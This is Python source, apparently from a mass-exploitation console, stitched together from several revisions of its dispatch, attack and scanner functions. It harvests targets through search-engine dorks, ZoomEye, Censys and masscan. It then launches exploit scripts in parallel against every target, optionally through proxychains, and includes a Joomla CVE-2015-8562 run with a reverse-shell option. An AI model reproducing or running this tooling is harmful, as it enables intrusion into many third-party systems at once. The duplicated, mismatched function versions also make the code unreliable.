        # let user check if there's anything wrong
        print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END,
              'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path), ' '.join(custom_args))
        # args as parameter for scanner
        scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs)
        # start scanner
        scanner(scanner_args)
    else:
        console.print_error('[-] Invalid input')
def execute(cmd) -> None:
    '''
    Dispatch one line of console input to the matching handler.

    Args:
        cmd: the raw input line.  It is lower-cased and stripped before
            matching, which also applies to anything that reaches the
            os.system() fallback at the bottom.

    Built-in commands: masscan, info, target <file>, init/i, baidu <dork>
    <count>, proxy, redis, google <dork>, q/quit, h/help/?, exploits,
    z/zoomeye, censys, x/reset, c/clear, attack/e.  Anything else is run
    through the system shell.
    '''
    # lol i don't want any errors here
    cmd = str(cmd).lower().strip()
    if cmd == '':
        return
    if cmd == "masscan":
        # check root, as masscan requires root privilege
        if os.geteuid() != 0:
            console.print_error("[-] Please run mec as root in order to run masscan")
            return
        ports = console.input_check("[?] What ports do you want to scan (eg. 80 443)? ").split()
        try:
            scan.masscan(ports)
        except KeyboardInterrupt:
            console.print_warning("[-] masscan exited")
    elif cmd == 'info':
        colored_print('[*] Current directory: {}\ \n[*] Init directory: {}\ \n[*] Log file: {}\ \n[*] Target: {}\ \n[*] Proxy config: {}'.format(os.getcwd(), SESSION.init_dir, SESSION.logfile, SESSION.ip_list, SESSION.proxy_conf), colors.CYAN)
    elif cmd.startswith('target'):
        target = ''.join(cmd.split()[1:])
        # Only an existing entry of <init_dir>/data is accepted, so the
        # joined path below cannot point outside that directory.
        if target not in os.listdir(SESSION.init_dir + '/data'):
            console.print_error("[-] Target file not found")
            return
        colored_print('[i] Target changed to {}'.format(target), colors.BLUE)
        SESSION.ip_list = SESSION.init_dir + '/data/' + target
    elif cmd in ('init', 'i'):
        colored_print('[*] Going back to init_dir...', colors.BLUE)
        os.chdir(SESSION.init_dir)
    elif cmd.startswith('baidu'):
        try:
            command = cmd.strip().split()
            dork = command[1]
            count = int(command[2])
            os.chdir(SESSION.out_dir)
            colored_print('[*] Searching on Baidu...', colors.PURPLE)
            baidu.spider(dork, count)
            if yes_no("Use collected URL's as target?"):
                # NOTE: no '/' between init_dir and the file name here,
                # unlike the censys branch below.
                SESSION.ip_list = SESSION.init_dir + "result.txt"
        except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
            # IndexError covers a missing dork/count argument.
            return
    elif cmd == 'proxy':
        if not os.path.exists(SESSION.ss_config):
            # Reported only; the Popen() below is still attempted.
            console.print_error('[-] Please make sure {} exists'.format(SESSION.ss_config))
        try:
            subprocess.Popen([SESSION.proxy_bin, '-c', SESSION.ss_config], stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False)
        except BaseException as err:
            console.print_error('[-] Error starting Shadowsocks proxy: ' + str(err))
            debug_except()
    elif cmd == 'redis':
        console.print_error('[-] Under development')
    elif cmd.startswith('google'):
        try:
            cmd = cmd.strip().split()
            dork = cmd[1]
            # well yes im a lazy guy
            subprocess.call(['./exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork, '--revshell=\'127.0.0.1\'', '--port=4444'])
        except BaseException as err:
            console.print_error(str(err))
            debug_except()
    elif cmd in ('q', 'quit'):
        check_kill_process('ss-proxy')
        sys.exit(0)
    elif cmd in ('h', 'help', '?'):
        print(console.HELP_INFO)
    elif cmd == 'exploits':
        colored_print('[+] Available exploits: ', colors.CYAN)
        for poc in list_exp():
            colored_print(poc, colors.BLUE)
    elif cmd in ('z', "zoomeye"):
        try:
            console.print_warning("[*] ZoomEye now asks for phone verification (+86 only)")
            zoomeye.run()
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
        else:
            # No-exception path: runs after zoomeye.run() returns normally.
            debug_except()
    elif cmd == "censys":
        try:
            output = censys.start()
            if yes_no("Use collected URL's as target?"):
                SESSION.ip_list = SESSION.init_dir + "/" + output
                colored_print('[i] Target changed to {}'.format(SESSION.ip_list), colors.BLUE)
        except BaseException:
            return
    elif cmd in ('x', 'reset'):
        os.system("reset")
    elif cmd in ('c', 'clear'):
        os.system("clear")
    elif cmd in ("attack", "e"):
        attack()
    else:
        # Fallback: run the (already lower-cased) line in the system shell.
        try:
            print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END, colors.GREEN + cmd, colors.END)
            os.system(cmd)
        except (EOFError, KeyboardInterrupt, SystemExit):
            return
def scanner(scanner_args) -> None:
    '''
    Run an exploit script once per line of SESSION.ip_list (4-tuple
    revision with a background tailf process).

    Args:
        scanner_args: 4-tuple (work_path, exec_path, custom_args, jobs).

    Child stdout/stderr are appended to SESSION.logfile.  Only the last
    process of each round of `jobs` launches is waited for.
    '''
    # looks ugly, but since it works well, im not planning a rewrite
    work_path, exec_path, custom_args, jobs = scanner_args[0], scanner_args[1], scanner_args[2], scanner_args[3]
    if SESSION.use_proxy:
        e_args = [
            'proxychains4', '-q', '-f', SESSION.proxy_conf, './' + exec_path]
    else:
        e_args = ['./' + exec_path]
    # add custom arguments for different exploits
    e_args += custom_args
    # the last argument is target host
    e_args += ['-t']
    try:
        # NOTE: target_list is never closed in this function.
        target_list = open(SESSION.ip_list)
    except BaseException as exc:
        console.print_error('[-] Error occured: {}\n'.format(exc))
        debug_except()
        return
    try:
        os.chdir('./exploits/' + work_path)
    except FileNotFoundError:
        # Only reported — execution continues in the current directory.
        console.print_error("[-] Can't chdir to " + work_path)
        debug_except()
    console.print_warning(
        '\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd())
    # you might want to cancel the scan to correct some errors
    if input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n':
        return
    console.print_warning('\n[!] It might be messy, get ready!' + '\n')
    time.sleep(2)
    # needed for the loop
    count = 0
    tested = count
    rnd = 1  # incremented per round but never displayed in this revision
    # save stdout to logfile
    # Unguarded: a missing log file raises here.
    logfile = open(SESSION.logfile, "a+")
    # start a thread in backgroud to display tailf info
    log = SESSION.logfile
    status = Process(target=tailf, args=(log,))
    try:
        status.start()
    except (SystemExit, KeyboardInterrupt, EOFError):
        status.terminate()
    # NOTE: `status` is not terminated after the loop below; only in the
    # except branch above.
    for line in target_list:
        target_ip = line.strip()
        # display progress info on top
        progress = colors.CYAN + colors.BOLD + \
            str(tested + 1) + colors.END + ' targets found\n'
        try:
            os.system('clear')
            sys.stdout.write('\r' + progress)
            sys.stdout.flush()
        except KeyboardInterrupt:
            exit()
        # mark this loop as done
        count += 1
        tested += 1
        try:
            # start and display current process
            e_args += [target_ip]
            sys.stdout.write(
                '\r' + colors.CYAN + ' '.join(e_args) + colors.END + '\n')
            sys.stdout.flush()
            try:
                proc = subprocess.Popen(e_args, stdout=logfile, stderr=logfile)
            except (KeyboardInterrupt, EOFError, SystemExit):
                # NOTE: if Popen() itself was interrupted on the first
                # iteration, `proc` is not bound yet and this raises
                # UnboundLocalError; later iterations kill the previous
                # process instead.
                proc.kill()
            # continue to next target
            e_args.remove(target_ip)
            time.sleep(.13)
            # process pool
            if count == jobs or count == 0:
                count = 0
                rnd += 1
                # Waits only for this round's last process.
                _, _ = proc.communicate()
                # if returned any exit code, consider the process as done
                if proc.returncode is not None:
                    proc.kill()
                    continue
        except (EOFError, KeyboardInterrupt, SystemExit):
            sys.exit(1)
    # close logfile
    logfile.close()
    os.system('clear')
    os.chdir(SESSION.init_dir)
    console.print_success('\n[+] All done!\n')
    print(console.INTRO)
def attack(self) -> None:
    '''
    Handle the console's `attack` command (Scanner-object revision).

    Sets self.use_proxy, reads the per-launch delay, then either runs a
    built-in module from exploit_exec.EXPLOIT_DICT or a user-selected
    script from futil.list_exp().  Both paths end in Scanner.scan().
    Returns None.
    '''
    self.use_proxy = console.yes_no(
        '[?] Do you wish to use proxy_pool/proxychains?')
    if self.use_proxy:
        if shutil.which("proxychains4") is None:
            console.print_error("proxychains4 not found")
            return
    # sleep between two subprocess open
    sleep_seconds = console.input_check("\n[?] Wait how many seconds" + " before each process launch?\n" + " (Set it to 0 when you want to use 100% CPU" + " / bandwidth\n Recommened value: 0.1)\n" + "\n[=] Your input: ", check_type=float)
    answ = console.input_check('\n[?] Do you wish to use\ \n\n [1] built-in exploits\ \n [2] or launch your own manually?\ \n\n[=] Your choice: ', choices=['1', '2', 'built-in', 'manually'])
    if answ in ['1', 'built-in']:
        print(
            colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n')
        colors.colored_print(futil.BUILT_IN, colors.GREEN)
        module = console.input_check(
            "[?] Choose your exploit module: ",
            choices=futil.BUILT_IN.split('\n'), allow_blank=False)
        try:
            # NOTE: EXPLOIT_DICT.get() returns None for an unknown key, and
            # calling None raises TypeError, which the except below does
            # not catch.  The launcher itself may return None (e.g. when a
            # file it needs is missing), which is handled.
            scanner_instance = exploit_exec.EXPLOIT_DICT.get(module)(self)
            if scanner_instance is None:
                return
            scanner_instance.sleep_seconds = sleep_seconds
            scanner_instance.scan()
            return
        except (EOFError, KeyboardInterrupt, SystemExit):
            return
    # run custom exploits
    print(
        colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can invoke your own exploit\n" + colors.END)
    cmd.run_exploits()
    exploit = console.input_check(
        "\n[*] Enter the path (eg. test/test) to your exploit: ",
        choices=futil.list_exp())
    jobs = int(
        console.input_check("[?] How many processes each time? ", check_type=int))
    custom_args = console.input_check(
        "[*] Addtional args for this exploit (other than `-t <target>`): ").strip().split()
    # parse user's exploit name
    # "dir/script" -> exec_path "script", work_path "dir"
    exec_path = exploit.split('/')[1:]
    work_path = exploit.split('/')[:-1]
    exec_path = '/'.join(exec_path)
    work_path = '/'.join(work_path)
    # args as parameter for scanner
    scanner_instance = Scanner(work_path, exec_path, custom_args, jobs, sleep_seconds, self)
    # start scanner
    scanner_instance.scan()
def scanner(scanner_args) -> None:
    '''
    Run an exploit script once per line of SESSION.ip_list with a curses
    status display (ScannerArgs revision).

    Args:
        scanner_args: object with work_path, exec_path, custom_args and
            jobs attributes (console.ScannerArgs).

    Child stdout/stderr are appended to SESSION.logfile; the last line of
    that file is shown on screen each iteration via tail().  Processes
    are waited for in batches of jobs+1; a partial final batch is left
    running when the target list ends.
    '''
    # looks ugly, but since it works well, im not planning a rewrite
    work_path, exec_path = scanner_args.work_path, scanner_args.exec_path
    custom_args, jobs = scanner_args.custom_args, scanner_args.jobs
    if SESSION.use_proxy:
        e_args = [
            'proxychains4', '-q', '-f', SESSION.proxy_conf, './' + exec_path
        ]
    else:
        e_args = ['./' + exec_path]
    # add custom arguments for different exploits
    e_args += custom_args
    # the last argument is target host
    e_args += ['-t']
    try:
        # NOTE: target_list is never closed in this function.
        target_list = open(SESSION.ip_list)
    except BaseException as exc:
        console.print_error('[-] Error occured: {}\n'.format(exc))
        debug_except()
        return
    try:
        os.chdir('./exploits/' + work_path)
    except FileNotFoundError:
        # Only reported — execution continues in the current directory.
        console.print_error("[-] Can't chdir to " + work_path)
        debug_except()
    console.print_warning('\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd())
    # you might want to cancel the scan to correct some errors
    if input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n':
        return
    console.print_warning('\n[!] It might be messy, get ready!' + '\n')
    time.sleep(2)
    # save stdout to logfile
    try:
        logfile = open(SESSION.logfile, "a+")
    except FileNotFoundError:
        # NOTE: logfile stays unbound here; the Popen() below would raise.
        console.print_error("[-] Log file not found")
    # needed for the loop
    procs = []
    count = len(procs)
    tested = count
    # use curses to display output
    import curses
    stdscr = curses.initscr()
    curses.start_color()
    curses.use_default_colors()
    curses.init_pair(1, curses.COLOR_CYAN, -1)
    curses.init_pair(2, curses.COLOR_WHITE, -1)
    curses.init_pair(3, curses.COLOR_GREEN, -1)
    for line in target_list:
        target_ip = line.strip()
        # clear screen for each output
        stdscr.refresh()
        # display progress info on top
        progress = str(tested) + ' targets found'
        # tail to get the last line of log file
        status = tail(SESSION.logfile)
        # mark this loop as done
        count = len(procs)
        tested += 1
        try:
            # start and display current process
            e_args += [target_ip]
            stdscr.addstr(0, 0, progress + '\n', curses.A_BOLD | curses.color_pair(1))
            stdscr.addstr(2, 0, ' '.join(e_args) + '\n', curses.color_pair(3))
            stdscr.addstr(4, 0, status, curses.color_pair(2))
            proc = subprocess.Popen(e_args, stdout=logfile, stderr=logfile)
            procs.append(proc)
            # continue to next target
            # NOTE: list.remove() drops the first equal element, so a
            # custom arg equal to target_ip would be removed instead.
            e_args.remove(target_ip)
            time.sleep(.11)
            # process pool
            # count was taken before the append, so this fires once procs
            # already held `jobs` entries (jobs+1 launches per round).
            if count == jobs:
                # if returned any exit code, consider the process as done
                for item in procs:
                    # communicate() blocks until the child exits, so
                    # returncode is always set by the time kill() runs.
                    item.communicate()
                    if item.returncode is not None:
                        item.kill()
                procs = []
        except (EOFError, KeyboardInterrupt, SystemExit):
            # Restore the terminal before printing anything.
            curses.endwin()
            for item in procs:
                if item.pid is not None:
                    item.kill()
            logfile.close()
            console.print_error("[-] Task aborted")
            # killall running processes
            check_kill_process(exec_path)
            return
    # close logfile, exit curses window, and print done flag
    curses.endwin()
    logfile.close()
    os.chdir(SESSION.init_dir)
    console.print_success('\n[+] All done!\n')